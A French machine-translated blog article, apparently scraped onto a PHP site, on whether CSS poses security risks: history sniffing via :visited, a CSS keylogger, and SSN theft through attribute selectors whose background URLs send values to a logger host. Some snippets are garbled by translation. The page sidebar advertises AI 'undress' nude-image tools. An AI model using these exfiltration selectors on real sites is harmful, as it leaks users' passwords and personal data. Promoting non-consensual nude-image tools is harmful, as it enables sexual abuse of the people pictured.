Ne pas paniquer! Le CSS lui-même n'est pas un risque de sécurité majeur, et dans la plupart des cas, il n'est pas nécessaire de s'inquiéter trop.
Cependant, certains articles discuteront des caractéristiques potentiellement surprenantes et même inquiétantes du CSS. Résumons:
Lier les problèmes qui ont été visités
Le problème est décrit comme suit:
- Il existe un lien sur le site Web vers une page spécifique, comme Tickle Pigs .
- Vous utilisez le style
:visited
pour définir la couleur du lien visité, commea:visited { color: pink; }
, qui n'est pas le style d'agent utilisateur par défaut. - Vous testez le style de calcul du lien.
- Si la couleur est rose, cela signifie que l'utilisateur a visité la page.
- Vous signalez ces informations à un serveur et effectuez certaines actions en conséquence (comme l'augmentation du taux de prime d'assurance).
Vous pourriez même le faire avec CSS complètement, car le :visited
peut contenir background-image: url(/data-logger/tickle.php);
, qui ne sera demandé que par les utilisateurs qui ont visité la page.
Ne t'inquiète pas! Les navigateurs ont bloqué cette attaque.
Clés
Le problème est décrit comme suit:
- Il y a une bo?te d'entrée sur la page, probablement une bo?te d'entrée de mot de passe.
- Vous prenez un script d'enregistrement comme image d'arrière-plan de la zone d'entrée et ajoutez un grand nombre de sélecteurs pour collecter les informations de mot de passe.
entrée [valeur ^ = "a"] {background: url (logger.php? v = a); }
Ce n'est pas facile à réaliser. value
de la zone d'entrée ne changera pas immédiatement en raison de l'entrée utilisateur. Mais dans des cadres comme React, cela se produit parfois. Ainsi, en théorie, ce CSS Keylogger pourrait fonctionner si vous ajoutez ce CSS à une page de connexion construite avec React.
Cependant, dans ce cas, le code JavaScript a été exécuté sur la page. Pour de telles attaques, JavaScript est beaucoup plus dangereux que CSS. Le JavaScript KeyLogger surveille les événements clés et les rapporte via Ajax avec seulement quelques lignes de code.
La politique de sécurité du contenu (CSP) peut bloquer le JavaScript en ligne injecté par des tiers et des XS ... et bien s?r, il peut également bloquer le CSS.
Vol de données
Le problème est décrit comme suit:
- Si je peux ajouter des CSS malveillants à la page du site Web, vous êtes connecté ...
- Et le site Web affiche des informations sensibles, telles qu'un numéro de sécurité sociale (SSN), pré-remplie sous la forme ...
- Je peux l'obtenir avec le sélecteur de propriétés.
entrée # ssn [value = "123-45-6789"] {background: url (https://secret-site.com/logger.php?ssn=123-45-6789); }
Avec un grand nombre de sélecteurs, vous pouvez couvrir toutes les possibilités!
Problème de bloc de style en ligne
Je ne sais pas si cela devrait être blamé à CSS, mais imaginez:
... insérez un contenu généré par l'utilisateur ...
Peut-être que vous permettez à l'utilisateur de personnaliser certains CSS. Il s'agit d'un vecteur d'attaque car ils peuvent fermer des balises de style, ouvrir des balises de script et écrire du code JavaScript malveillant.
Il y a certainement plus
Y avez-vous pensé? Partagez-le.
Je suis sceptique quant au niveau de peur des vulnérabilités de sécurité CSS. Je ne veux pas trop sur les problèmes de sécurité (en particulier les problèmes tiers) parce que je ne suis pas un expert et que la sécurité est cruciale. Mais en même temps, je n'ai jamais entendu parler de CSS de devenir un vecteur d'attaque autre que des expériences de pensée. S'il vous pla?t, apprenez-moi!
Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Outils d'IA chauds

Undress AI Tool
Images de déshabillage gratuites

Undresser.AI Undress
Application basée sur l'IA pour créer des photos de nu réalistes

AI Clothes Remover
Outil d'IA en ligne pour supprimer les vêtements des photos.

Clothoff.io
Dissolvant de vêtements AI

Video Face Swap
échangez les visages dans n'importe quelle vidéo sans effort grace à notre outil d'échange de visage AI entièrement gratuit?!

Article chaud

Outils chauds

Bloc-notes++7.3.1
éditeur de code facile à utiliser et gratuit

SublimeText3 version chinoise
Version chinoise, très simple à utiliser

Envoyer Studio 13.0.1
Puissant environnement de développement intégré PHP

Dreamweaver CS6
Outils de développement Web visuel

SublimeText3 version Mac
Logiciel d'édition de code au niveau de Dieu (SublimeText3)

Il existe trois fa?ons de créer un rotateur de chargement CSS: 1. Utilisez le rotateur de base des frontières pour obtenir une animation simple via HTML et CSS; 2. Utilisez un rotateur personnalisé de plusieurs points pour atteindre l'effet de saut à travers différents temps de retard; 3. Ajoutez un rotateur dans le bouton et basculez les classes via JavaScript pour afficher l'état de chargement. Chaque approche souligne l'importance des détails de conception tels que la couleur, la taille, l'accessibilité et l'optimisation des performances pour améliorer l'expérience utilisateur.

Pour faire face à la compatibilité du navigateur CSS et aux problèmes de préfixe, vous devez comprendre les différences de prise en charge du navigateur et utiliser raisonnablement les préfixes des fournisseurs. 1. Comprendre les problèmes communs tels que Flexbox et le support de la grille, Position: Sticky Invalid et les performances d'animation sont différentes; 2. Vérifier l'état du support de la fonction de confirmation de Caniuse; 3. Utilisez correctement -webkit-, -moz-, -ms-, -o- et autres préfixes du fabricant; 4. Il est recommandé d'utiliser AutopRefixer pour ajouter automatiquement les préfixes; 5. Installez PostCSS et configurez le navigateur pour spécifier le navigateur cible; 6. Gérer automatiquement la compatibilité pendant la construction; 7. Les fonctionnalités de détection modernizr peuvent être utilisées pour les anciens projets; 8. Pas besoin de poursuivre la cohérence de tous les navigateurs,

HEMAINDIFFERENCESBetweendisplay: Inline, Block, Andinline-BlockInhtml / CSSareLayoutBehavior, SpaceUsage et StylingControl.1.InlineElementsflowWithText, Don'tStartNewLines, Ignorewidth / Height, AndonlyApplyhorizontalPadding / Marges - IdealForninetLetetStyLinSing

La définition du style de liens que vous avez visité peut améliorer l'expérience utilisateur, en particulier dans les sites Web à forte intensité de contenu pour aider les utilisateurs à mieux naviguer. 1. Utilisez CSS: Pseudo-classe visité pour définir le style du lien visité, tels que les changements de couleur; 2. Notez que le navigateur permet uniquement la modification de certains attributs en raison des restrictions de confidentialité; 3. La sélection des couleurs doit être coordonnée avec le style global pour éviter la brutalité; 4. Le terminal mobile peut ne pas afficher cet effet et il est recommandé de le combiner avec d'autres invites visuelles telles que les logos auxiliaires ic?nes.

Utilisez l'attribut Clip-Path de CSS pour recadrer des éléments en formes personnalisées, telles que les triangles, les encoches circulaires, les polygones, etc., sans compter sur des images ou des SVG. Ses avantages incluent: 1. Prend en charge une variété de formes de base telles que le cercle, l'ellipse, le polygone, etc.; 2. Ajustement réactif et adaptable aux terminaux mobiles; 3. Facile à l'animation, et peut être combiné avec le survol ou le javascript pour obtenir des effets dynamiques; 4. Il n'affecte pas le flux de disposition et ne culte que la zone d'affichage. Les usages communs sont tels que le chemin de clip circulaire: cercle (50pxatcenter) et trame de clip Triangle: polygone (50% 0%, 100 0%, 0 0%). Avis

Pour créer des images réactives à l'aide de CSS, elle peut être principalement réalisée grace aux méthodes suivantes: 1. Utilisez la largeur maximale: 100% et hauteur: Auto pour permettre à l'image de s'adapter à la largeur du conteneur tout en maintenant la proportion; 2. Utilisez les attributs SRCSET et tailles de HTML pour charger intelligemment les sources d'image adaptées à différents écrans; 3. Utilisez l'objet-ajustement et la position d'objet pour contr?ler le recadrage d'images et l'affichage de la mise au point. Ensemble, ces méthodes garantissent que les images sont présentées clairement et magnifiquement sur différents appareils.

Le choix des unités CSS dépend des exigences de conception et des exigences réactives. 1.PX est utilisé pour la taille fixe, adaptée à un contr?le précis mais au manque d'élasticité; 2.EM est une unité relative, qui est facilement causée par l'influence de l'élément parent, tandis que REM est plus stable en fonction de l'élément racine et convient à la mise à l'échelle globale; 3.VW / VH est basé sur la taille de la fenêtre, adaptée à la conception réactive, mais l'attention doit être accordée aux performances sous des écrans extrêmes; 4. Lors du choix, il doit être déterminé en fonction de la question de savoir si les ajustements réactifs, les relations de hiérarchie d'éléments et la dépendance de la fenêtre. Une utilisation raisonnable peut améliorer la flexibilité et la maintenance de la disposition.

Différents navigateurs ont des différences dans l'analyse CSS, ce qui entra?ne des effets d'affichage incohérents, y compris principalement la différence de style par défaut, la méthode de calcul du modèle de bo?te, le niveau de support Flexbox et la disposition de la grille et le comportement incohérent de certains attributs CSS. 1. Le traitement de style par défaut est incohérent. La solution consiste à utiliser cssreset ou normaliser.css pour unifier le style initial; 2. La méthode de calcul du modèle de bo?te de l'ancienne version de IE est différente. Il est recommandé d'utiliser la taille d'une bo?te: Border-Box de manière unifiée; 3. Flexbox et Grid fonctionnent différemment dans les cas de bord ou dans les anciennes versions. Plus de tests et utilisent Autoprefixer; 4. Certains comportements d'attribut CSS sont incohérents. Caniuse doit être consulté et rétrogradé.
